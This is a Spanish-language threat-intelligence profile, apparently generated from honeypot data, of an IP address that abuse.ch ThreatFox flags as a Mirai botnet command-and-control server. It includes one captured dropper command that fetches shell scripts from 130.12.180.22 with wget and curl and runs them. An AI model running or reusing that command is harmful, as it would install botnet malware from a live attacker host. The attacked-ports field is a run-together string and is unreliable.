TROYANOSYVIRUS
Amenaza ActivaALTO

130.12.180.108

Primera Deteccion5/1/2026
Ultima Actividad1/2/2026
ISPRailnet LLC
🎯
158
Ataques Totales
🔌
13
Puertos
📡
4
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Desconocida
ASN
AS214943
ISP
Railnet LLC

Tipos de Ataque

adbhoney
honeytrap
honeyaml
tanner

Puertos Atacados

409645634345671700080377777000555580883000300155008191

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://130.12.180.22/file/w.sh; sh w.sh; curl http://130.12.180.22/file/c.sh; sh c.sh2x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONOCIDO
Familias de Malware
elf.mirai
Tipos de Amenaza
botnet_cc
Confianza: 75%

Evaluacion de Riesgo

75
/100
BajoMedioAltoCritico